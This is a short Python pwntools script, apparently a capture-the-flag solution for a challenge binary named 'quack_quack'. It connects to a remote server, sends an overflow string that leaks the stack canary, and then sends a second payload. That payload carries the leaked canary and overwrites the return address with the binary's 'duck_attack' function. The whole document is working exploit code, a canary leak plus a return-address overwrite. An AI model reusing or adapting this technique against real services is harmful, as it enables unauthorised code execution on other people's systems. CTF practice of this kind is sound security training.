1  from pwn import *
 2  
 3  context.binary = binary = ELF('/home/bumpy/Downloads/challenge/quack_quack',checksec=False)
 4  p = remote('94.237.63.198',54926)
 5  payload1 = b'a'*0x59+b'Quack Quack '
 6  p.sendlineafter(b'> ', payload1)
 7  p.recvuntil(b'Quack Quack ')
 8  canary = u64(b'\x00'+p.recv(7))
 9  print(f'canary: {hex(canary)}')
10  payload2 = b'A'*88 + p64(canary) + b'B'*8 + p64(binary.symbols.duck_attack)
11  p.sendline(payload2)
12  p.recvuntil(b'Did you really expect to win a fight against a Duck?!\n\n')
13  
14  print(p.recvline().decode())